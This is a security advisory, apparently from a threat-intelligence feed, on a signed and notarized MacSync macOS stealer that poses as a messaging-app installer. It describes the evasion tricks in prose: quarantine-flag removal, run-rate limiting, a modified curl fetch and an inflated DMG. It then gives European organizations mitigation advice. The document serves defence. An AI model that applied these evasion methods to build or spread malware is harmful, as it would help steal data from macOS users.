The newly identified MacSync macOS stealer variant represents an evolution in macOS malware distribution and evasion techniques. Unlike prior versions relying on manual user actions like drag-to-terminal or ClickFix exploits, this variant uses a fully signed and notarized Swift application packaged within a DMG file named "zk-call-messenger-installer-3.9.2-lts.dmg," hosted on a malicious domain. The code signing and notarization allow the malware to bypass Apple's Gatekeeper and XProtect defenses, which typically block unsigned or suspicious executables. The installer prompts users to right-click and open the app, a known method to circumvent Gatekeeper warnings. Once executed, the Swift dropper performs several operational checks: verifying internet connectivity, enforcing a minimum one-hour interval between executions to avoid detection, and removing quarantine flags from files to prevent macOS security prompts. The payload retrieval uses a modified curl command with flags split and additional options like --noproxy, indicating deliberate attempts to evade network-based detection or filtering. The DMG file is artificially inflated to 25.5 MB by embedding unrelated PDFs, likely to evade size-based heuristics. The Base64-encoded payload corresponds to MacSync, a rebranded Mac.c malware first seen in April 2025, which includes a Go-based agent capable of extensive data theft and remote command and control functions. This agent can exfiltrate sensitive information and potentially allow attackers to manipulate infected systems remotely. Apple has revoked the signing certificate used, but the campaign exemplifies a broader trend where macOS malware increasingly leverages legitimate signing and notarization to appear trustworthy. Similar tactics have been observed in other macOS stealers like Odyssey and DigitStealer, though some still use unsigned disk images. This evolution complicates detection and mitigation, requiring enhanced endpoint monitoring and user education to recognize deceptive installers.

For European organizations, this threat poses significant risks to the confidentiality and integrity of sensitive data stored on macOS endpoints. The malware’s ability to bypass Gatekeeper and XProtect means traditional macOS security controls may fail to prevent infection, increasing the likelihood of successful compromise. Organizations relying on macOS devices for critical communications, intellectual property, or personal data processing could face data breaches, regulatory non-compliance (e.g., GDPR violations), and operational disruptions. The remote command and control capabilities of MacSync enable attackers to maintain persistence, escalate privileges, and potentially move laterally within networks, amplifying the impact. Given the malware’s distribution as a messaging app installer, sectors with high reliance on communication tools—such as finance, legal, and media—are particularly vulnerable. The stealthy nature of the malware, including rate limiting and obfuscation, complicates detection and incident response. Additionally, the use of signed and notarized binaries undermines trust in Apple’s security ecosystem, potentially leading to increased user risk exposure across Europe.

European organizations should implement multi-layered defenses tailored to this threat’s characteristics. First, enforce strict application whitelisting policies using tools like Apple’s Endpoint Security framework or third-party EDR solutions that can detect anomalous behaviors beyond signature validation. Deploy network monitoring to identify unusual outbound connections, especially those matching the observed curl command patterns or connections to suspicious domains like "zkcall[.]net." Educate users to avoid installing software from unverified sources and to be cautious with right-click bypasses of Gatekeeper prompts. Regularly update macOS systems to incorporate the latest security patches and revoked certificate lists from Apple. Employ advanced threat detection solutions capable of analyzing process behavior, script execution, and file attribute changes (e.g., quarantine flag removals). Conduct periodic audits of installed applications and disk images to detect unusually large or suspicious DMG files. Finally, implement incident response playbooks specific to macOS malware infections, including isolating affected devices and forensic analysis to identify data exfiltration.